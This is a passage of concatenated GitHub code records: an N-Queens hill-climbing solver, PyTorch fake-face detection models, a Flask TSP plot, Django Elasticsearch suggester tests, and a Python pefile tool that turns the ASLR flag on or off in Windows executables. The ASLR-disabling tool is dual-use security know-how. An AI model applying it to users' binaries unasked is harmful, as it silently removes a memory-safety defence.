diagonals(self): # Function that stores the amount of queens in each diagonal\n diagonals = [] # diagonals[0] --> down diagonals\n diagonals.append([0]*(n+1)) # diagonals[1] --> up diagonals\n diagonals.append([0]*(n+1))\n for q in queens:\n if (q[0]-q[1])+2 <= n:\n diagonals[0][(q[0]-q[1])+2] += 1 # adds one to the down diagonal\n if (((q[0]+q[1])-1) >= 0) and (((q[0]+q[1])-1)<=n):\n diagonals[1][(q[0]+q[1])-1] += 1 # adds one to the up diagonal\n \n return diagonals \n \n \n\ndef move_queen (q): # this function returns all the posible column positions where we can move a queen\n new_queens = []\n for x in range(0,n):\n if x != q[1]:\n new_queens.append((q[0],x))\n return new_queens\n\n# Conflict count first version\ndef conflict_count_1st(queens):\n conflicts = 0\n for q in queens:\n for k in queens: # checks every other queen\n if k != q:\n if q[1] == k[1]: # checks queen's column\n conflicts += 1\n if abs(q[0]-k[0]) == abs(q[1]-k[1]): # checks both queen's diagonals at the same time\n conflicts += 1\n return conflicts\n\n\n# Conflict count second version\n\ndef conflict_count_2nd(state):\n conflicts = 0;\n for q in state.queens:\n if state.columns[q[1]] > 1: # checks the amount of queens in q's column\n conflicts += (state.columns[q[1]]-1)\n if ((q[0]-q[1])+2) <= n: \n if state.diagonals[0][(q[0]-q[1])+2] > 1: # checks the amount of queens in q's down diagonal\n conflicts += (state.diagonals[0][(q[0]-q[1])+2]-1)\n if (((q[0]+q[1])-1) >= 0) and (((q[0]+q[1])-1)<=n):\n if state.diagonals[1][(q[0]+q[1])-1] > 1: # cheks the amount of queens in q's up diagonal\n conflicts += (state.diagonals[1][(q[0]+q[1])-1]-1)\n return conflicts\n\n# Function that helps us find all the indices where a certain element is stored at on a list\ndef find_indices(list_to_check, item_to_find):\n return [idx for idx, value in enumerate(list_to_check) if value == item_to_find]\n\n#First version\n\n@profile\ndef first_version(initial_state, steps):\n current_state = initial_state\n while conflict_count_1st(current_state.queens) != 0: # it keeps running while the number of conflicts is different than 0\n \n new_states_queens = [] # here we store all the posible new state queen's configurations\n conflicts = int(conflict_count_1st(current_state.queens)/2)\n for q in current_state.queens: # we do this for each one of the n queens\n moved_q = move_queen(q) # call the move_queen function\n state_queens = copy.deepcopy(current_state.queens) \n state_queens.remove(q) # Removes q's original position\n\n for i in moved_q: # for every queen's possible new position we create a new configuration\n state_queens.insert(q[0],i)\n new_states_queens.append(copy.deepcopy(state_queens)) # we store the n queens positions\n state_queens.remove(i)\n \n conflicts_number = []\n \n for n_queens in new_states_queens: # for each queens configuration we calculate the number\n conflicts_number.append(int(conflict_count_1st(n_queens)/2)) # of conflicts and we store them in a list\n \n indexes_min = find_indices(conflicts_number, min(conflicts_number))\n random_index = random.randint(0,len(indexes_min)-1)\n index = indexes_min[random_index] # we select the index randomly for not always select the same configuration\n steps.append(new_states_queens[index])\n current_state.queens = copy.deepcopy(new_states_queens[index]) # we change the queens position of the current state \n # to the one that causes the less conflicts \n return len(steps)\n \n# Second Version\n\n@profile\ndef second_version(initial_state, steps):\n current_state = initial_state\n while conflict_count_2nd(current_state) != 0: # it keeps running while the number of conflicts is different than 0\n \n new_states_queens = [] # here we store all the posible new state queen's configurations\n \n for q in current_state.queens: # we do this for each one of the n queens\n moved_q = move_queen(q) # call the move_queen function\n \n for i in moved_q: # for every queen's possible new position we create a configuration\n state_queens = []\n for p in range(0,n):\n if p != q[0]:\n state_queens.append(current_state.queens[p])\n state_queens.insert(q[0],i)\n new_states_queens.append(state_queens) # we store the n queens position\n \n conflicts_number = []\n \n for n_queens in new_states_queens: # we calculate and store the number of conflicts for every\n new_state = state(n_queens,n) # different configuration with the improved version of conflict counting\n n_conflicts = copy.deepcopy(conflict_count_2nd(new_state)) \n conflicts_number.append(n_conflicts/2) \n \n steps.append(new_states_queens[conflicts_number.index(min(conflicts_number))])\n current_state.queens = new_states_queens[conflicts_number.index(min(conflicts_number))] # we change the queens position of the current state\n # to the one that causes the less conflict\n return len(steps)\n\n# Third version\n\n@profile\ndef third_version(initial_state, steps):\n current_state = initial_state\n while conflict_count_2nd(current_state) != 0: # it keeps running while the number of conflicts is different than 0\n \n flag = False # flag that indicates if it has found a lower conflicts state\n equal_states = []\n \n for q in current_state.queens: # we do this for each one of the n queens\n if flag:\n break\n moved_q = move_queen(q) # call the move_queen function\n state_queens = copy.deepcopy(current_state.queens)\n state_queens.remove(q) # removing q's original position\n \n for i in moved_q: # for every queen's possible new position we create a new configuration\n state_queens.insert(q[0],i)\n new_state = state(state_queens,n)\n n_conflicts = copy.deepcopy(conflict_count_2nd(new_state)) # counts the conflicts for that configuration\n if n_conflicts < conflict_count_2nd(current_state): # if it's lower than the current conflicts number\n steps.append(state_queens) \n current_state.queens = copy.deepcopy(state_queens) # it becomes the new current state's configuration \n flag = True \n break\n if n_conflicts == conflict_count_2nd(current_state): # if it's equal to the current conflicts number\n equal_states.append(copy.deepcopy(state_queens)) # it saves this configuration in a list\n state_queens.remove(i)\n \n if not flag: # if a lower conflicts configuration was not found\n random_index = random.randint(0,len(equal_states)-1) \n steps.append(equal_states[random_index]) \n current_state.queens = copy.deepcopy(equal_states[random_index]) # it sets a random configuration selected from the equal conflicts number configuration \n \n return(len(steps)) \n\nn = 4\n \n#Genariting randomly the initial state \nqueens = []\nfor x in range (0,n):\n xth_queen = (x,random.randint(0,n-1))\n queens.append(xth_queen)\n\n \ninitial_state = state(queens,n) # Declaring the initial state\nsteps = [queens]\n\nprint(third_version(initial_state, steps)) # calls the algorithm ","repo_name":"SebastianCastro23/N_Queens","sub_path":"Hill_Climbing.py","file_name":"Hill_Climbing.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17475850440","text":"from turtle import forward\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .efficientnet_pytorch.model import EfficientNet as Model\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nuse_gpu = torch.cuda.is_available()\n\nclass crop_model(nn.Module):\n def __init__(self, in_channel, num_classes) -> None:\n super().__init__()\n self.flatten = torch.nn.Flatten()\n self.line = torch.nn.Linear(18, 2)\n self.model = densenet(in_channel, num_classes, need_return_dic = False)\n \n\n def build_ans(self,x):\n return {\n \"pred_logits\":x,\n }\n\n def forward(self, input):\n try:\n p, c, _, _ = input[0].size()\n except Exception as e:\n print(e)\n print(len(input), input[0].size())\n # ans_ = torch.zeros(p,1)\n # if(use_gpu):\n # ans_ = ans_.to(device)\n ans_ = []\n for i in input:\n ans = self.model(i)\n ans_.append(ans)\n # ans_ = torch.mul( ans_ ,ans)\n a = torch.stack( ans_, 1)\n\n #print(a.size())\n a = self.flatten(a)\n #print(a.size())\n ans_ = self.line(a)\n #print(ans_.size())\n return self.build_ans(ans_)\n\nclass crop_model1(nn.Module):\n def __init__(self, a,b, channel) -> None:\n super().__init__()\n self.flatten = torch.nn.Flatten()\n self.line = torch.nn.Linear(32, 2)\n self.model = Model(a,b,9)\n if(use_gpu):\n self.model.to(device)\n\n def build_ans(self,x):\n return {\n \"pred_logits\":x,\n }\n\n def forward(self, input):\n try:\n p, c, _, _ = input[0].size()\n except Exception as e:\n print(e)\n print(len(input), input[0].size())\n #method 1:\n # ans_ = torch.zeros(p,1)\n # if(use_gpu):\n # ans_ = ans_.to(device)\n # ans_ = []\n # for i in input:\n # ans = self.model(i)\n # ans_.append(ans)\n # # ans_ = torch.mul( ans_ ,ans)\n # a = torch.stack( ans_, 1)\n #method 2:\n input = self.crop_tensor(input)\n a = self.model(input)\n \n print(a.size())\n a = self.flatten(a)\n #print(a.size())\n ans_ = self.line(a)\n #print(ans_.size())\n return self.build_ans(ans_)\n\n def crop_tensor(self, image_pack, scale = 4):\n _, _, w, h = image_pack.size()\n a = int(w/scale)\n b = int(h/scale)\n t = torch.split(image_pack, a, dim = 2)\n ans = []\n for i in t:\n for j in torch.split(i,b, dim=3):\n ans.append(j)\n d = torch.cat(ans,1)\n return d","repo_name":"aoxipo/fakefacedetect","sub_path":"model/Ceffici.py","file_name":"Ceffici.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"31888700970","text":"import os\nimport pefile\nimport argparse\nimport sys\n\nbanner = ''' \n @@@@@@ @@@@@@ @@@ @@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@ \n@@@@@@@@ @@@@@@@ @@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@ \n@@! @@@ !@@ @@! @@! @@@ @@! @@! @@@ @@! @@@ @@! \n!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! @!@ !@! \n@!@!@!@! !!@@!! @!! @!@!!@! @!! @!@ !@! @!@ !@! @!! \n!!!@!!!! !!@!!! !!! !!@!@! !!! !@! !!! !@! !!! !!! \n!!: !!! !:! !!: !!: :!! !!: !!: !!! !!: !!! !!: \n:!: !:! !:! :!: :!: !:! :!: :!: !:! :!: !:! :!: \n:: ::: :::: :: :: :::: :: ::: ::::::::::::: :: ::::: :: ::::: :: :: :::: \n : : : :: : : : :: : : : : : ::::::::::::: : : : : : : : : :: : : \n\n \n \n \n \n ''' \n\n\n\ndef has_aslr_enabled(pe):\n \"\"\"Verifica se o ASLR está ativado para o arquivo PE fornecido.\"\"\"\n return bool(pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS[\"IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\"])\n\ndef disable_aslr(file_path):\n \"\"\"Desativa o ASLR do arquivo PE fornecido.\"\"\"\n pe = pefile.PE(file_path)\n if not has_aslr_enabled(pe):\n print(\"ASLR já está desativado para este arquivo.\\n\\n\\n\")\n return\n\n backup_and_modify(file_path, pe, False)\n\ndef enable_aslr(file_path):\n \"\"\"Ativa o ASLR do arquivo PE fornecido.\"\"\"\n pe = pefile.PE(file_path)\n if has_aslr_enabled(pe):\n print(\"ASLR já está ativado para este arquivo.\\n\\n\\n\")\n return\n\n backup_and_modify(file_path, pe, True)\n\ndef backup_and_modify(file_path, pe, enable):\n \"\"\"Faz backup e modifica o ASLR do arquivo PE fornecido.\"\"\"\n backup_dir = \"backup\"\n if not os.path.exists(backup_dir):\n os.makedirs(backup_dir)\n\n backup_file_path = os.path.join(backup_dir, os.path.basename(file_path))\n with open(file_path, \"rb\") as original_file, open(backup_file_path, \"wb\") as backup_file:\n backup_file.write(original_file.read())\n\n if enable:\n pe.OPTIONAL_HEADER.DllCharacteristics |= pefile.DLL_CHARACTERISTICS[\"IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\"]\n else:\n pe.OPTIONAL_HEADER.DllCharacteristics &= ~pefile.DLL_CHARACTERISTICS[\"IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\"]\n\n modified_file_path = os.path.splitext(file_path)[0] + (\"_aslr_on\" if enable else \"_aslr_off\") + os.path.splitext(file_path)[1]\n pe.write(filename=modified_file_path)\n\n print(f\"Backup salvo em: {backup_file_path}\")\n print(f\"\\n\\n\\nArquivo modificado salvo em: {modified_file_path}\")\n\ndef verify_aslr(file_path):\n \"\"\"Verifica o status do ASLR do arquivo PE fornecido.\"\"\"\n pe = pefile.PE(file_path)\n if has_aslr_enabled(pe):\n print(\"ASLR ATIVADO\\n\\n\\n\")\n else:\n print(\"ASLR DESATIVADO\\n\\n\\n\")\n\nif __name__ == \"__main__\":\n print(banner)\n parser = argparse.ArgumentParser(description=\"Ferramenta para verificar, desativar e ativar ASLR em arquivos PE.\", add_help=False)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-f\", \"--file\", help=\"Caminho do arquivo PE para DESATIVAR o ASLR.\", type=str)\n group.add_argument(\"-v\", \"--verify\", help=\"Caminho do arquivo PE para VERIFICAR o status do ASLR.\", type=str)\n group.add_argument(\"-ON\", help=\"Caminho do arquivo PE para ATIVAR o ASLR.\", type=str)\n group.add_argument(\"-h\", \"-help\", \"--help\", action=\"help\", default=argparse.SUPPRESS, help=\"Mostra essa mensagem de ajuda e sai.\")\n\n try:\n args = parser.parse_args()\n except SystemExit:\n print(\"Erro: Nenhum argumento fornecido. Use '-h' para ver as opções disponíveis.\\n\\n\\n\")\n sys.exit(1)\n\n if args.file:\n disable_aslr(args.file)\n elif args.verify:\n verify_aslr(args.verify)\n elif args.ON:\n enable_aslr(args.ON)\n","repo_name":"carlosadrianosj/ASLR_TOOL","sub_path":"aslr_tool.py","file_name":"aslr_tool.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"19052768786","text":"from flask import Flask, render_template\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\r\nimport io\r\nimport base64\r\nimport numpy as np\r\n\r\napp = Flask(__name__)\r\n\r\ndef tspVisualization():\r\n # Function to close the window\r\n def close_window():\r\n window.destroy()\r\n # Close the matplotlib figure\r\n plt.close(fig)\r\n\r\n # Function to plot the TSP tour\r\n def plot_tour(points, tour):\r\n global fig # Declare fig as a global variable\r\n\r\n fig, ax = plt.subplots(figsize=(6, 6))\r\n ax.scatter(points[:, 0], points[:, 1], color='blue', s=50)\r\n ax.plot(points[tour + [tour[0]], 0], points[tour + [tour[0]], 1], color='red', linewidth=2)\r\n ax.set_xlabel('X')\r\n ax.set_ylabel('Y')\r\n ax.set_title('TSP Tour')\r\n ax.grid(True)\r\n\r\n # Create a canvas to display the matplotlib figure in the Tkinter window\r\n canvas = FigureCanvas(fig)\r\n canvas.draw()\r\n\r\n # Save the plot to a bytes buffer\r\n buffer = io.BytesIO()\r\n canvas.print_png(buffer)\r\n buffer.seek(0)\r\n\r\n # Encode the bytes buffer as a base64 string\r\n plot_data = base64.b64encode(buffer.getvalue()).decode('utf-8')\r\n\r\n return plot_data\r\n\r\n # Example data\r\n points = np.array([[0, 0], [1, 3], [2, 1], [4, 2], [3, 0]])\r\n\r\n # Example tour\r\n tour = [0, 1, 3, 2, 0]\r\n\r\n plot_data = plot_tour(points, tour)\r\n\r\n return plot_data\r\n\r\n@app.route('/')\r\ndef index():\r\n plot_data = tspVisualization()\r\n return render_template('tsp_visualization.html', plot_data=plot_data)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"mesteri15micro/disszertaciosDolgozat","sub_path":"tsp_visualization_2.py","file_name":"tsp_visualization_2.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8306345308","text":"import os\nimport sys\nimport glob\n\nimport inspect\n\ndef load_modules(filemask='*.py', ignore_list=('__init__.py', )):\n \"\"\"\n This loads all modules from the formatters directory\n \"\"\"\n modules = {}\n dirname = os.path.dirname(__file__)\n\n if dirname:\n filemask = os.path.join(dirname, filemask)\n\n for fn in glob.glob(filemask):\n fn = os.path.split(fn)[1]\n\n if fn in ignore_list:\n continue\n\n fn = os.path.splitext(fn)[0]\n modules[fn] = __import__(fn, globals(), locals())\n\n return modules\n\n\ndef get_formatter(formatter_class):\n \"\"\"\n This will generate HTML for a specific markup language but will not\n highlight source code\n \"\"\"\n cls = ''\n\n if formatter_class == 'rst':\n cls = 'RestructuredTextFormatter'\n elif formatter_class == 'markdown':\n cls = 'MarkdownFormatter'\n else:\n cls = formatter_class\n\n load_modules()\n current_module = sys.modules[__name__]\n formatter = get_module_classes(current_module, cls)\n\n return formatter\n\n\ndef get_module_classes(module, formatter_class):\n \"\"\"\n Recursively searches through all modules looking for the class\n that we are asking for\n \"\"\"\n for name, obj in inspect.getmembers(module, inspect.isclass):\n if obj.__name__ == formatter_class:\n return obj\n\n # Didn't find the class we want on that module, loop thorugh\n # its child modules\n for name, obj in inspect.getmembers(module, inspect.ismodule):\n if obj.__name__.startswith(__name__):\n cls = get_module_classes(obj, formatter_class)\n\n if cls:\n return cls\n","repo_name":"eventray-archive/hiero","sub_path":"hiero/formatters/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"14169924009","text":"# coding: utf-8\n\"\"\"\nTest suggestions backend.\n\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport unittest\n\nfrom django.core.management import call_command\nfrom django.urls import reverse\n\nimport pytest\n\nfrom rest_framework import status\n\nimport factories\n\nfrom ..versions import (\n ELASTICSEARCH_GTE_5_0,\n ELASTICSEARCH_GTE_6_0,\n ELASTICSEARCH_GTE_7_0,\n)\nfrom .base import BaseRestFrameworkTestCase\nfrom .data_mixins import AddressesMixin\n\n__title__ = 'django_elasticsearch_dsl_drf.tests.test_suggesters'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = (\n 'TestContextSuggesters',\n 'TestSuggesters',\n 'TestSuggestersEmptyIndex',\n)\n\n\n@pytest.mark.django_db\nclass TestSuggesters(BaseRestFrameworkTestCase, AddressesMixin):\n \"\"\"Test suggesters.\"\"\"\n\n pytestmark = pytest.mark.django_db\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Set up class.\"\"\"\n super(TestSuggesters, cls).setUpClass()\n\n cls.publishers = []\n cls.publishers.append(\n factories.PublisherFactory(\n name='Addison–Wesley',\n city='Brighton & Hove',\n state_province='East Midlands',\n country='Armenia',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Adis International',\n city='Bristol',\n state_province='East of England',\n country='Argentina',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Atlantic Books',\n city='Cardiff',\n state_province='North East',\n country='Belgium',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Atlas Press',\n city='Carlisle',\n state_province='North West',\n country='Belarus',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Book League of America',\n city='Chelmsford',\n state_province='South East',\n country='Burkina Faso',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Book Works',\n city='Chester',\n state_province='South West',\n country='Burundi',\n )\n )\n cls.publishers.append(\n factories.PublisherFactory(\n name='Booktrope',\n city='Chichester',\n state_province='West Midlands',\n country='Netherlands',\n )\n )\n\n cls.publishers_url = reverse(\n 'publisherdocument-suggest',\n kwargs={}\n )\n\n cls.books = []\n cls.books.append(\n factories.BookFactory(\n title='Aaaaa Bbbb',\n summary='`Twas brillig, and the slithy toves '\n 'Did gyre and gimble in the wabe. '\n 'All mimsy were the borogoves '\n 'And the mome raths outgrabe.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Aaaaa Cccc',\n summary='\"Beware the Jabberwock, my son! '\n 'The jaws that bite, the claws that catch! '\n 'Beware the Jubjub bird, and shun '\n 'The frumious Bandersnatch!',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Aaaaa Dddd',\n summary='He took his vorpal sword in his hand,'\n 'Long time the manxome foe he sought --'\n 'So rested he by the Tumtum tree,'\n 'And stood awhile in thought.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n\n cls.books += factories.BookFactory.create_batch(\n 10,\n publisher__name='Oxford University Press',\n publisher__city='Yerevan',\n publisher__state_province='Ararat',\n publisher__country='Ireland',\n )\n\n cls.books_url = reverse(\n 'bookdocument-suggest',\n kwargs={}\n )\n\n cls.books_suggest_context_url = reverse(\n 'bookdocument_frontend-suggest',\n kwargs={}\n )\n\n cls.authors = []\n cls.authors.append(\n factories.AuthorFactory(\n name='John Doe',\n salutation='Aaa Bbb',\n )\n )\n cls.authors.append(\n factories.AuthorFactory(\n name='Jane Doe',\n salutation='Aaa Ccc',\n )\n )\n cls.authors.append(\n factories.AuthorFactory(\n name='Armen Doe',\n salutation='Bbb Ccc',\n )\n )\n\n cls.authors_url = reverse(\n 'authordocument-suggest',\n kwargs={}\n )\n\n cls.created_addresses()\n\n cls.sleep()\n call_command('search_index', '--rebuild', '-f')\n\n def _test_suggesters(self, test_data, url):\n \"\"\"Test suggesters.\"\"\"\n self.authenticate()\n\n data = {}\n\n for _suggester_field, _test_cases in test_data.items():\n\n for _test_case, _expected_results in _test_cases.items():\n _url = url + '?' + _suggester_field + '=' + _test_case\n # Check if response now is valid\n response = self.client.get(\n _url,\n data\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIn(_suggester_field, response.data)\n _unique_options = list(set([\n __o['text']\n for __o\n in response.data[_suggester_field][0]['options']\n ]))\n self.assertEqual(\n len(_unique_options),\n len(_expected_results),\n (\n _url,\n _test_case,\n _expected_results,\n _unique_options\n )\n )\n\n def test_suggesters_completion(self):\n \"\"\"Test suggesters completion.\"\"\"\n # Testing publishers\n test_data = {\n 'name_suggest__completion': {\n 'Ad': ['Addison–Wesley', 'Adis International'],\n 'Atl': ['Atlantic Books', 'Atlas Press'],\n 'Boo': ['Book League of America', 'Book Works', 'Booktrope'],\n },\n 'country_suggest__completion': {\n 'Arm': ['Armenia'],\n 'Ar': ['Armenia', 'Argentina'],\n 'Bel': ['Belgium', 'Belarus'],\n 'Bur': ['Burkina Faso', 'Burundi'],\n 'Net': ['Netherlands'],\n 'Fra': [],\n }\n }\n # Testing default suggesters as well\n test_data.update(\n {\n 'name_suggest': test_data['name_suggest__completion'],\n 'country_suggest': test_data['country_suggest__completion'],\n }\n )\n self._test_suggesters(test_data, self.publishers_url)\n\n # Testing books\n test_data = {\n 'title_suggest__completion': {\n 'Aaa': ['Aaaaa Bbbb', 'Aaaaa Cccc', 'Aaaaa Dddd'],\n 'Bbb': [],\n },\n }\n self._test_suggesters(test_data, self.books_url)\n\n # Testing authors\n test_data = {\n 'salutation.suggest__completion': {\n 'Aaa': ['Aaa Bbb', 'Aaa Ccc'],\n 'Bbb': ['Bbb Ccc'],\n 'Hhh': [],\n },\n }\n self._test_suggesters(test_data, self.authors_url)\n\n def test_suggesters_completion_no_args_provided(self):\n \"\"\"Test suggesters completion with no args provided.\"\"\"\n data = {}\n # Check if response now is valid\n response = self.client.get(self.publishers_url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n def test_suggesters_term(self):\n \"\"\"Test suggesters term.\"\"\"\n # Testing books\n test_data = {\n 'summary_suggest__term': {\n 'borogovse': ['borogov'],\n 'Tumtus': ['tumtum'],\n 'Jabberwok': ['jabberwock'],\n 'tovse': ['tove', 'took', 'twas'],\n },\n }\n self._test_suggesters(test_data, self.books_url)\n\n def test_suggesters_phrase(self):\n \"\"\"Test suggesters phrase.\"\"\"\n # Testing books\n test_data = {\n 'summary_suggest__phrase': {\n 'slith tovs': ['slithi tov'],\n 'mimsy boroto': ['mimsi borogov'],\n },\n }\n self._test_suggesters(test_data, self.books_url)\n\n def test_nested_fields_suggesters_completion(self):\n \"\"\"Test suggesters completion for nested fields.\"\"\"\n # Testing cities and countries\n test_data = {\n 'city_suggest__completion': {\n 'Ye': ['Yerevan', 'Yeovil'],\n 'Yer': ['Yerevan'],\n 'Ams': ['Amsterdam'],\n 'Du': ['Dublin'],\n 'Ne': [],\n },\n 'country_suggest__completion': {\n 'Arm': ['Armenia'],\n 'Ar': ['Armenia', 'Argentina'],\n 'Re': ['Republic of Ireland'],\n 'Net': ['Netherlands'],\n 'Fra': [],\n }\n }\n self._test_suggesters(test_data, self.addresses_suggest_url)\n\n\n@pytest.mark.django_db\nclass TestSuggestersEmptyIndex(BaseRestFrameworkTestCase, AddressesMixin):\n \"\"\"Test suggesters on empty index.\"\"\"\n\n pytestmark = pytest.mark.django_db\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Set up class.\"\"\"\n cls.authors_url = reverse(\n 'authordocument-suggest',\n kwargs={}\n )\n\n cls.sleep()\n # Suggest on empty index\n call_command('search_index', '--delete', '-f')\n call_command('search_index', '--create', '-f')\n\n def test_suggesters_on_empty_index(self):\n \"\"\"Test suggesters phrase.\"\"\"\n response = self.client.get(\n self.authors_url + '?name_suggest__completion=Ad',\n {}\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n if ELASTICSEARCH_GTE_7_0:\n self.assertTrue(\n bool(response.data.get('name_suggest__completion'))\n )\n elif ELASTICSEARCH_GTE_6_0:\n self.assertFalse(bool(response.data))\n else:\n self.assertFalse(\n bool(response.data.get('name_suggest__completion'))\n )\n\n\n@unittest.skipIf(not ELASTICSEARCH_GTE_5_0, 'ES >=5.x only')\n@pytest.mark.django_db\nclass TestContextSuggesters(BaseRestFrameworkTestCase, AddressesMixin):\n \"\"\"Test context suggesters.\"\"\"\n\n pytestmark = pytest.mark.django_db\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Set up class.\"\"\"\n # Books\n cls.books = []\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Bbbb',\n summary='`Twas brillig, and the slithy toves '\n 'Did gyre and gimble in the wabe. '\n 'All mimsy were the borogoves '\n 'And the mome raths outgrabe.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Cccc',\n summary='\"Beware the Jabberwock, my son! '\n 'The jaws that bite, the claws that catch! '\n 'Beware the Jubjub bird, and shun '\n 'The frumious Bandersnatch!',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Dddd',\n summary='He took his vorpal sword in his hand,'\n 'Long time the manxome foe he sought --'\n 'So rested he by the Tumtum tree,'\n 'And stood awhile in thought.',\n publisher__name='Antares',\n publisher__country='Armenia',\n )\n )\n cls.books.append(\n factories.BookFactory(\n title='Ccccc Eeee',\n summary='She took his zorpal blade in his hand,'\n 'Long time the manxome foe he sought --'\n 'So rested he by the Tumtum tree,'\n 'And stood awhile in thought.',\n # publisher__name='Mario',\n # publisher__country='US',\n )\n )\n\n cls.books += factories.BookFactory.create_batch(\n 10,\n publisher__name='Oxford University Press',\n publisher__city='Yerevan',\n publisher__state_province='Ararat',\n publisher__country='Ireland',\n )\n\n cls.books_suggest_context_url = reverse(\n 'bookdocument_frontend-suggest',\n kwargs={}\n )\n\n # Addresses\n cls.addresses = []\n cls.addresses.append(\n factories.AddressFactory(\n street='Halabyan',\n city__name='Yerevan',\n latitude=40.0742719,\n longitude=44.1930605,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Hambardzumyan',\n city__name='Yerevan',\n latitude=40.01,\n longitude=44.01,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Haghartsin',\n city__name='Yerevan',\n latitude=39.92,\n longitude=43.92,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Hamazaspyan',\n city__name='Tatev',\n latitude=39.3793612,\n longitude=46.2480006,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Harazatyan',\n city__name='Tatev',\n latitude=39.3793612,\n longitude=46.2480006,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Hardewijk',\n city__name='Groningen',\n latitude=53.2246892,\n longitude=6.56429,\n )\n )\n cls.addresses.append(\n factories.AddressFactory(\n street='Haringstraat',\n city__name='Groningen',\n latitude=53.2246892,\n longitude=6.56429,\n )\n )\n\n cls.addresses_suggest_context_url = reverse(\n 'addressdocument_frontend-suggest',\n kwargs={}\n )\n\n cls.sleep()\n call_command('search_index', '--rebuild', '-f')\n\n def _test_suggesters_completion_context(self, test_data, url):\n \"\"\"Test suggesters completion context.\"\"\"\n self.authenticate()\n\n data = {}\n\n for _suggester_field, _test_cases in test_data.items():\n\n for _test_case, _test_data in _test_cases.items():\n _url = url + '?' + _suggester_field + '=' + _test_case\n for _query_param, _value in _test_data['filters'].items():\n _url += '&{}={}'.format(_query_param, _value)\n # Check if response now is valid\n response = self.client.get(\n _url,\n data\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIn(_suggester_field, response.data)\n _unique_options = list(set([\n __o['text']\n for __o\n in response.data[_suggester_field][0]['options']\n ]))\n self.assertEqual(\n len(_unique_options),\n len(_test_data['expected_results']),\n (\n _url,\n _test_case,\n _test_data['expected_results'],\n _unique_options\n )\n )\n\n def test_suggesters_completion_context(self):\n \"\"\"Test suggesters completion context.\"\"\"\n # Testing books\n test_data = {\n 'title_suggest_context': {\n 'Ccc': {\n 'expected_results': [\n 'Ccccc Bbbb',\n 'Ccccc Cccc',\n 'Ccccc Dddd',\n ],\n 'filters': {\n 'title_suggest_publisher': 'Antares',\n }\n },\n },\n }\n self._test_suggesters_completion_context(\n test_data,\n self.books_suggest_context_url\n )\n\n # Testing addresses\n test_data = {\n 'street_suggest_context': {\n 'Ha': {\n 'expected_results': [\n 'Halabyan',\n 'Hambardzumyan',\n 'Haghartsin',\n 'Hamazaspyan',\n 'Harazatyan',\n ],\n 'filters': {\n 'title_suggest_loc': (\n '40__44__1000km'\n if ELASTICSEARCH_GTE_6_0\n else '40__44'\n ),\n }\n },\n },\n }\n self._test_suggesters_completion_context(\n test_data,\n self.addresses_suggest_context_url\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/tests/test_suggesters.py","file_name":"test_suggesters.py","file_ext":"py","file_size_in_byte":18645,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"36500544563","text":"t = int(input())\n\nfor _ in range(t):\n \n entrada = input()\n \n col = ord(entrada[0])\n row = ord(entrada[1])\n #- ord('0')\n\n for i in 